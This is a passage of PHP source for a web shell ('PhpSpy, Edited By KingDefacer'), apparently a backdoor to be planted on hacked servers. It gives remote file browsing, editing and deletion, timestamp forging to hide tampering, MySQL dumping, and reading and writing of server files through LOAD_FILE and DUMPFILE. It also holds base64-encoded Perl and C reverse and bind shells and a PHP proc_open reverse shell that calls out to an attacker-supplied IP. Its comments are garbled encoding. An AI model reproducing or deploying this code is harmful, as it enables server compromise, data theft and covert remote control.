$_value) { if ($_key{0} != '_') { if (IS_GPC) { $_value = s_array($_value); } $$_key = $_value; } } } /*===================== ³Ì�òÅäÖà =====================*/ $admin = array(); // ÊÇ·ñ�èÒªÃÜÂëÑéÖ¤, true Ϊ�èÒªÑéÖ¤, false Ϊֱ½Ó½øÈë.�ÂÃæÑ¡�îÔòÎÞ�§ $admin['check'] = false; // Èç¹û�èÒªÃÜÂëÑéÖ¤,Çë�޸ĵǽÃÜÂë $admin['pass'] = 'hack'; //ÈçÄú¶Ô cookie ×÷Ó÷¶Î§Ó�ÌØÊâÒªÇó, »òµÇ¼²»Õý³£, Çë�Þ¸Ä�ÂÃæ±ä�¿, ·ñÔòÇë±£³ÖĬÈ� // cookie ǰ׺ $admin['cookiepre'] = ''; // cookie ×÷ÓÃÓò $admin['cookiedomain'] = ''; // cookie ×÷Ó÷¾¶ $admin['cookiepath'] = '/'; // cookie Ó��§ÆÚ $admin['cookielife'] = 86400; /*===================== ÅäÖýáÊø =====================*/ if ($charset == 'utf8') { header("content-Type: text/html; charset=utf-8"); } elseif ($charset == 'big5') { header("content-Type: text/html; charset=big5"); } elseif ($charset == 'gbk') { header("content-Type: text/html; charset=gbk"); } elseif ($charset == 'latin1') { header("content-Type: text/html; charset=iso-8859-2"); } $self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']; $timestamp = time(); /*===================== Éí·�ÑéÖ¤ =====================*/ if ($action == "logout") { scookie('phpspypass', '', -86400 * 365); p(''); p('Success'); exit; } if($admin['check']) { if ($doing == 'login') { if ($admin['pass'] == $password) { scookie('phpspypass', $password); p(''); p('Success'); exit; } } if ($_COOKIE['phpspypass']) { if ($_COOKIE['phpspypass'] != $admin['pass']) { loginpage(); } } else { loginpage(); } } /*===================== ÑéÖ¤½áÊø =====================*/ $errmsg = ''; // �ÂÔØÎļþ if ($doing == 'downfile' && $thefile) { if (!@file_exists($thefile)) { $errmsg = 'The file you want Downloadable was nonexistent'; } else { $fileinfo = pathinfo($thefile); header('Content-type: application/x-'.$fileinfo['extension']); header('Content-Disposition: attachment; filename='.$fileinfo['basename']); header('Content-Length: '.filesize($thefile)); @readfile($thefile); exit; } } // Ö±½Ó�ÂÔر¸·�Êý¾�¿â if ($doing == 'backupmysql' && !$saveasfile) { dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); $table = array_flip($table); $result = q("SHOW tables"); if (!$result) p('


'); $filename = basename($_SERVER['HTTP_HOST'].'_MySQL.sql'); @header('Content-type: application/unknown'); @header('Content-Disposition: attachment; filename='.$filename); $mysqldata = ''; while ($currow = mysql_fetch_array($result)) { if (isset($table[$currow[0]])) { $mysqldata .= sqldumptable($currow[0]); } } mysql_close(); exit; } // �¨¹ýMYSQL�ÂÔØÎļþ if($doing=='mysqldown'){ if (!$dbname) { $errmsg = 'Please input dbname'; } else { dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); if (!file_exists($mysqldlfile)) { $errmsg = 'The file you want Downloadable was nonexistent'; } else { $result = q("select load_file('$mysqldlfile');"); if(!$result){ q("DROP TABLE IF EXISTS tmp_magiccoder;"); q("CREATE TABLE tmp_magiccoder (content LONGBLOB NOT NULL);"); //ÓÃʱ¼ä´�À´±íʾ½Ø¶�,±ÜÃâ³ö�Ö¶�È¡×ÔÉí»ò°üº¬__magiccoder_1111111111_eof__µÄÎļþʱ²»�êÕûµÄÇé¿ö q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_magiccoder FIELDS TERMINATED BY '__magiccoder_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__magiccoder_{$timestamp}_eof__';"); $result = q("select content from tmp_magiccoder"); q("DROP TABLE tmp_magiccoder"); } $row = @mysql_fetch_array($result); if (!$row) { $errmsg = 'Load file failed '.mysql_error(); } else { $fileinfo = pathinfo($mysqldlfile); header('Content-type: application/x-'.$fileinfo['extension']); header('Content-Disposition: attachment; filename='.$fileinfo['basename']); header("Accept-Length: ".strlen($row[0])); echo $row[0]; exit; } } } } ?> <?php echo str_replace('.','','P.h.p.S.p.y');?> | Edited By KingDefacer
MagicCoder ()
Safe Mode: Logout |";}else{}?> File Manager | MySQL Manager | MySQL Upload & Download | Execute Command |";} ?> PHP Variable | Eval PHP Code | NET";} ?>
'); p(''); //²é¿´ËùÓ�¿É�´Îļþº�Ŀ¼ $dirdata=array(); $filedata=array(); if ($view_writable) { $dirdata = GetList($nowpath); } else { // Ŀ¼��±í $dirs=@opendir($dir); while ($file=@readdir($dirs)) { $filepath=$nowpath.$file; if(@is_dir($filepath)){ $dirdb['filename']=$file; $dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath)); $dirdb['dirchmod']=getChmod($filepath); $dirdb['dirperm']=getPerms($filepath); $dirdb['fileowner']=getUser($filepath); $dirdb['dirlink']=$nowpath; $dirdb['server_link']=$filepath; $dirdb['client_link']=ue($filepath); $dirdata[]=$dirdb; } else { $filedb['filename']=$file; $filedb['size']=sizecount(@filesize($filepath)); $filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath)); $filedb['filechmod']=getChmod($filepath); $filedb['fileperm']=getPerms($filepath); $filedb['fileowner']=getUser($filepath); $filedb['dirlink']=$nowpath; $filedb['server_link']=$filepath; $filedb['client_link']=ue($filepath); $filedata[]=$filedb; } }// while unset($dirdb); unset($filedb); @closedir($dirs); } @sort($dirdata); @sort($filedata); $dir_i = '0'; foreach($dirdata as $key => $dirdb){ if($dirdb['filename']!='..' && $dirdb['filename']!='.') { $thisbg = bg(); p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(''); $dir_i++; } else { if($dirdb['filename']=='..') { p(''); p(''); p(''); } } } p(''); p(''); makehide('action','file'); makehide('thefile'); makehide('doing'); makehide('dir',$nowpath); $file_i = '0'; foreach($filedata as $key => $filedb){ if($filedb['filename']!='..' && $filedb['filename']!='.') { $fileurl = str_replace(SA_ROOT,'',$filedb['server_link']); $thisbg = bg(); p(''); p(''); p(''); p(''); p(''); p(''); p(''); $file_i++; } } p(''); p('
'goaction')); makehide('action'); formfoot(); $errmsg && m($errmsg); // »ñÈ¡µ±Ç°Â·¾¶ !$dir && $dir = '.'; $nowpath = getPath(SA_ROOT, $dir); if (substr($dir, -1) != '/') { $dir = $dir.'/'; } $uedir = ue($dir); if (!$action || $action == 'file') { // Å�¶�¶��´Çé¿ö $dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable'; // ɾ³ýĿ¼ if ($doing == 'deldir' && $thefile) { if (!file_exists($thefile)) { m($thefile.' directory does not exist'); } else { m('Directory delete '.(deltree($thefile) ? basename($thefile).' success' : 'failed')); } } // ´´½¨Ä¿Â¼ elseif ($newdirname) { $mkdirs = $nowpath.$newdirname; if (file_exists($mkdirs)) { m('Directory has already existed'); } else { m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed')); @chmod($mkdirs,0777); } } // É�´«Îļþ elseif ($doupfile) { m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed')); } // ±à¼¼þ elseif ($editfilename && $filecontent) { $fp = @fopen($editfilename,'w'); m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed')); @fclose($fp); } // ±à¼¼þÊô�Ô elseif ($pfile && $newperm) { if (!file_exists($pfile)) { m('The original file does not exist'); } else { $newperm = base_convert($newperm,8,10); m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed')); } } // ¸ÄÃû elseif ($oldname && $newfilename) { $nname = $nowpath.$newfilename; if (file_exists($nname) || !file_exists($oldname)) { m($nname.' has already existed or original file does not exist'); } else { m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed')); } } // ¸´ÖÆÎļþ elseif ($sname && $tofile) { if (file_exists($tofile) || !file_exists($sname)) { m('The goal file has already existed or original file does not exist'); } else { m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed')); } } // ¿Ë¡ʱ¼ä elseif ($curfile && $tarfile) { if (!@file_exists($curfile) || !@file_exists($tarfile)) { m('The goal file has already existed or original file does not exist'); } else { $time = @filemtime($tarfile); m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed')); } } // ×Ô¶¨Òåʱ¼ä elseif ($curfile && $year && $month && $day && $hour && $minute && $second) { if (!@file_exists($curfile)) { m(basename($curfile).' does not exist'); } else { $time = strtotime("$year-$month-$day $hour:$minute:$second"); m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed')); } } // ´ò°ü�ÂÔØ elseif($doing == 'downrar') { if ($dl) { $dfiles=''; foreach ($dl as $filepath => $value) { $dfiles.=$filepath.','; } $dfiles=substr($dfiles,0,strlen($dfiles)-1); $dl=explode(',',$dfiles); $zip=new PHPZip($dl); $code=$zip->out; header('Content-type: application/octet-stream'); header('Accept-Ranges: bytes'); header('Accept-Length: '.strlen($code)); header('Content-Disposition: attachment;filename='.$_SERVER['HTTP_HOST'].'_Files.tar.gz'); echo $code; exit; } else { m('Please select file(s)'); } } // Åú�¿É¾³ýÎļþ elseif($doing == 'delfiles') { if ($dl) { $dfiles=''; $succ = $fail = 0; foreach ($dl as $filepath => $value) { if (@unlink($filepath)) { $succ++; } else { $fail++; } } m('Deleted file have finished£¬choose '.count($dl).' success '.$succ.' fail '.$fail); } else { m('Please select file(s)'); } } //²Ù×÷�ê±� formhead(array('name'=>'createdir')); makehide('newdirname'); makehide('dir',$nowpath); formfoot(); formhead(array('name'=>'fileperm')); makehide('newperm'); makehide('pfile'); makehide('dir',$nowpath); formfoot(); formhead(array('name'=>'copyfile')); makehide('sname'); makehide('tofile'); makehide('dir',$nowpath); formfoot(); formhead(array('name'=>'rename')); makehide('oldname'); makehide('newfilename'); makehide('dir',$nowpath); formfoot(); formhead(array('name'=>'fileopform')); makehide('action'); makehide('opfile'); makehide('dir'); formfoot(); $free = @disk_free_space($nowpath); !$free && $free = 0; $all = @disk_total_space($nowpath); !$all && $all = 0; $used = $all-$free; $used_percent = @round(100/($all/$free),2); p('

File Manager - Current disk free '.sizecount($free).' of '.sizecount($all).' ('.$used_percent.'%)

'); ?>
Current Directory (, )
'); p('
'); p('WebRoot'); if ($view_writable) { p(' | View All'); } else { p(' | View Writable'); } p(' | Create Directory | Create File'); if (IS_WIN && IS_COM) { $obj = new COM('scripting.filesystemobject'); if ($obj && is_object($obj)) { $DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk'); foreach($obj->Drives as $drive) { if ($drive->DriveType == 2) { p(' | '.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')'); } else { p(' | '.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')'); } } } } p('
 FilenameLast modifiedSizeChmod / PermsAction
0'.$dirdb['filename'].''.$dirdb['mtime'].'--'); p(''.$dirdb['dirchmod'].' / '); p(''.$dirdb['dirperm'].''.$dirdb['fileowner'].'Del | Rename
=Parent Directory
'.$filedb['filename'].''.$filedb['mtime'].''.$filedb['size'].''); p(''.$filedb['filechmod'].' / '); p(''.$filedb['fileperm'].''.$filedb['fileowner'].''); p('Down | '); p('Copy | '); p('Edit | '); p('Rename | '); p('Time'); p('
Packing download selected - Delete selected'.$dir_i.' directories / '.$file_i.' files
'); }// end dir elseif ($action == 'sqlfile') { if($doing=="mysqlupload"){ $file = $_FILES['uploadfile']; $filename = $file['tmp_name']; if (file_exists($savepath)) { m('The goal file has already existed'); } else { if(!$filename) { m('Please choose a file'); } else { $fp=@fopen($filename,'r'); $contents=@fread($fp, filesize($filename)); @fclose($fp); $contents = bin2hex($contents); if(!$upname) $upname = $file['name']; dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); $result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';"); m($result ? 'Upload success' : 'Upload has failed: '.mysql_error()); } } } ?> 'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1'); formhead(array('title'=>'MYSQL Information','name'=>'dbinfo')); makehide('action','sqlfile'); p('

'); p('DBHost:'); makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost)); p(':'); makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport)); p('DBUser:'); makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser)); p('DBPass:'); makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass)); p('DBName:'); makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname)); p('DBCharset:'); makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset)); p('

'); formfoot(); p('
'); p('

Upload file

'); p('

This operation the DB user must has FILE privilege

'); p('

Save path(fullpath): Choose a file: Upload

'); p('

Download file

'); p('

File: Download

'); makehide('dbhost'); makehide('dbport'); makehide('dbuser'); makehide('dbpass'); makehide('dbname'); makehide('charset'); makehide('doing'); makehide('action','sqlfile'); p('
'); } elseif ($action == 'sqladmin') { !$dbhost && $dbhost = 'localhost'; !$dbuser && $dbuser = 'root'; !$dbport && $dbport = '3306'; $dbform = ''; if(isset($dbhost)){ $dbform .= "\n"; } if(isset($dbuser)) { $dbform .= "\n"; } if(isset($dbpass)) { $dbform .= "\n"; } if(isset($dbport)) { $dbform .= "\n"; } if(isset($dbname)) { $dbform .= "\n"; } if(isset($charset)) { $dbform .= "\n"; } if ($doing == 'backupmysql' && $saveasfile) { if (!$table) { m('Please choose the table'); } else { dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); $table = array_flip($table); $fp = @fopen($path,'w'); if ($fp) { $result = q('SHOW tables'); if (!$result) p('


'); $mysqldata = ''; while ($currow = mysql_fetch_array($result)) { if (isset($table[$currow[0]])) { sqldumptable($currow[0], $fp); } } fclose($fp); $fileurl = str_replace(SA_ROOT,'',$path); m('Database has success backup to '.$path.''); mysql_close(); } else { m('Backup failed'); } } } if ($insert && $insertsql) { $keystr = $valstr = $tmp = ''; foreach($insertsql as $key => $val) { if ($val) { $keystr .= $tmp.$key; $valstr .= $tmp."'".addslashes($val)."'"; $tmp = ','; } } if ($keystr && $valstr) { dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error()); } } if ($update && $insertsql && $base64) { $valstr = $tmp = ''; foreach($insertsql as $key => $val) { $valstr .= $tmp.$key."='".addslashes($val)."'"; $tmp = ','; } if ($valstr) { $where = base64_decode($base64); dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error()); } } if ($doing == 'del' && $base64) { $where = base64_decode($base64); $delete_sql = "DELETE FROM $tablename WHERE $where"; dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error()); } if ($tablename && $doing == 'drop') { dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); if (q("DROP TABLE $tablename")) { m('Drop table of success'); $tablename = ''; } else { m(mysql_error()); } } $charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1'); formhead(array('title'=>'MYSQL Manager')); makehide('action','sqladmin'); p('

'); p('DBHost:'); makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost)); p(':'); makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport)); p('DBUser:'); makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser)); p('DBPass:'); makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass)); p('DBCharset:'); makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset)); makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt')); p('

'); formfoot(); ?> 'recordlist')); makehide('doing'); makehide('action','sqladmin'); makehide('base64'); makehide('tablename'); p($dbform); formfoot(); //Ñ¡¶¨Êý¾�¿â formhead(array('name'=>'setdbname')); makehide('action','sqladmin'); p($dbform); if (!$dbname) { makehide('dbname'); } formfoot(); //Ñ¡¶¨±í formhead(array('name'=>'settable')); makehide('action','sqladmin'); p($dbform); makehide('tablename'); makehide('page',$page); makehide('doing'); formfoot(); $cachetables = array(); $pagenum = 30; $page = intval($page); if($page) { $start_limit = ($page - 1) * $pagenum; } else { $start_limit = 0; $page = 1; } if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) { dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); //»ñÈ¡Êý¾�¿â�Å�¢ $mysqlver = mysql_get_server_info(); p('

MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'

'); $highver = $mysqlver > '4.1' ? 1 : 0; //»ñÈ¡Êý¾�¿â $query = q("SHOW DATABASES"); $dbs = array(); $dbs[] = '-- Select a database --'; while($db = mysql_fetch_array($query)) { $dbs[$db['Database']] = $db['Database']; } makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1)); $tabledb = array(); if ($dbname) { p('

'); p('Current dababase: '.$dbname.''); if ($tablename) { p(' | Current Table: '.$tablename.' [ Insert | Structure | Drop ]'); } p('

'); mysql_select_db($dbname); $getnumsql = ''; $runquery = 0; if ($sql_query) { $runquery = 1; } $allowedit = 0; if ($tablename && !$sql_query) { $sql_query = "SELECT * FROM $tablename"; $getnumsql = $sql_query; $sql_query = $sql_query." LIMIT $start_limit, $pagenum"; $allowedit = 1; } p('
'); p('

Run SQL query/queries on database '.$dbname.':

'); makehide('tablename', $tablename); makehide('action','sqladmin'); p($dbform); p('
'); if ($tablename || ($runquery && $sql_query)) { if ($doing == 'structure') { $result = q("SHOW COLUMNS FROM $tablename"); $rowdb = array(); while($row = mysql_fetch_array($result)) { $rowdb[] = $row; } p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(''); foreach ($rowdb as $row) { $thisbg = bg(); p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(''); } tbfoot(); } elseif ($doing == 'insert' || $doing == 'edit') { $result = q('SHOW COLUMNS FROM '.$tablename); while ($row = mysql_fetch_array($result)) { $rowdb[] = $row; } $rs = array(); if ($doing == 'insert') { p('

Insert new line in '.$tablename.' table »

'); } else { p('

Update record in '.$tablename.' table »

'); $where = base64_decode($base64); $result = q("SELECT * FROM $tablename WHERE $where LIMIT 1"); $rs = mysql_fetch_array($result); } p(''); p($dbform); makehide('action','sqladmin'); makehide('tablename',$tablename); p('
'.$row['Field'].''.$row['Type'].''.$row['Null'].' '.$row['Key'].' '.$row['Default'].' '.$row['Extra'].' 
'); foreach ($rowdb as $row) { if ($rs[$row['Field']]) { $value = htmlspecialchars($rs[$row['Field']]); } else { $value = ''; } $thisbg = bg(); p(''); p(''); } if ($doing == 'insert') { p(''); } else { p(''); makehide('base64', $base64); } p('
'); } else { $querys = @explode(';',$sql_query); foreach($querys as $num=>$query) { if ($query) { p("

Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."

"); switch(qy($query)) { case 0: p('

Error : '.mysql_error().'

'); break; case 1: if (strtolower(substr($query,0,13)) == 'select * from') { $allowedit = 1; } if ($getnumsql) { $tatol = mysql_num_rows(q($getnumsql)); $multipage = multi($tatol, $pagenum, $page, $tablename); } if (!$tablename) { $sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query))); $sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line); preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches); $tablename = $matches[1][0]; } $result = q($query); p($multipage); p(''); p(''); if ($allowedit) p(''); $fieldnum = @mysql_num_fields($result); for($i=0;$i<$fieldnum;$i++){ $name = @mysql_field_name($result, $i); $type = @mysql_field_type($result, $i); $len = @mysql_field_len($result, $i); p(""); } p(''); while($mn = @mysql_fetch_assoc($result)){ $thisbg = bg(); p(''); $where = $tmp = $b1 = ''; foreach($mn as $key=>$inside){ if ($inside) { $where .= $tmp.$key."='".addslashes($inside)."'"; $tmp = ' AND '; } $b1 .= ''; } $where = base64_encode($where); if ($allowedit) p(''); p($b1); p(''); unset($b1); } tbfoot(); p($multipage); break; case 2: $ar = mysql_affected_rows(); p('

affected rows : '.$ar.'

'); break; } } } } } else { $query = q("SHOW TABLE STATUS"); $table_num = $table_rows = $data_size = 0; $tabledb = array(); while($table = mysql_fetch_array($query)) { $data_size = $data_size + $table['Data_length']; $table_rows = $table_rows + $table['Rows']; $table['Data_length'] = sizecount($table['Data_length']); $table_num++; $tabledb[] = $table; } $data_size = sizecount($data_size); unset($table); p('
'.html_clean($inside).' Edit | Del
'); p(''); makehide('action','sqladmin'); p($dbform); p(''); p(''); p(''); p(''); p(''); p(''); p(''); if ($highver) { p(''); p(''); } p(''); foreach ($tabledb as $key => $table) { $thisbg = bg(); p(''); p(''); p(''); p(''); p(''); p(''); p(''); if ($highver) { p(''); p(''); } p(''); } p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(""); makehide('doing','backupmysql'); formfoot(); p("
'.$table['Name'].' [ Insert | Structure | Drop ]'.$table['Rows'].''.$table['Data_length'].''.$table['Create_time'].''.$table['Update_time'].''.$table['Engine'].''.$table['Collation'].'
 Total tables: '.$table_num.''.$table_rows.''.$data_size.' 
Save as file
"); fr($query); } } } tbfoot(); @mysql_close(); }//end sql backup elseif ($action == 'net') { !$yourip && $yourip = $_SERVER['REMOTE_ADDR']; !$yourport && $yourport = '1370'; $usedb = array('perl'=>'perl','php'=>'php (proc_open)','c'=>'c'); $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj". "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR". "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT". "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI". "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC". "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb". "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd". "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ". "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC". "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D". "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp". "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; $bind_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS". "VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs". "JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV". "TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG". "lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK". "Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i". "Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N". "lIENPTk47DQpleGl0IDA7DQp9DQp9"; if ($start_cb && $yourip && $yourport && $use){ if ($use == 'perl') { cf('/tmp/magiccoder_bc',$back_connect); switch ($_POST['execfunction_cb']) { case 'system': $res = @system(which('perl')." /tmp/magiccoder_bc $yourip $yourport &"); break; case 'passthru': $res = @passthru(which('perl')." /tmp/magiccoder_bc $yourip $yourport &"); break; case 'exec': $res = @exec(which('perl')." /tmp/magiccoder_bc $yourip $yourport &"); break; case 'execute': $res = @execute(which('perl')." /tmp/magiccoder_bc $yourip $yourport &"); break; case 'shell_exec': $res = @shell_exec(which('perl')." /tmp/magiccoder_bc $yourip $yourport &"); break; case 'popen': $res = @fread(popen(which('perl')." /tmp/magiccoder_bc $yourip $yourport &",r), 9999); break; } } elseif ($use == 'php') { set_time_limit (0); $VERSION = "1.0"; $ip = $yourip; $port = $yourport; $chunk_size = 1400; $write_a = null; $error_a = null; $shell = "uname -a; w; id; /bin/sh -i"; $daemon = 0; $debug = 0; chdir("/"); umask(0); $sock = @fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { echo("$errstr ($errno)"); exit(1); } $descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); while (1) { if (feof($sock)) { break; } if (feof($pipes[1])) { break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) echo("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) echo("SOCK: $input"); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) echo("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) echo("STDOUT: $input"); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) echo("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) echo("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); } else { echo '
Use from '.$_POST['execfunction_cb'].' function
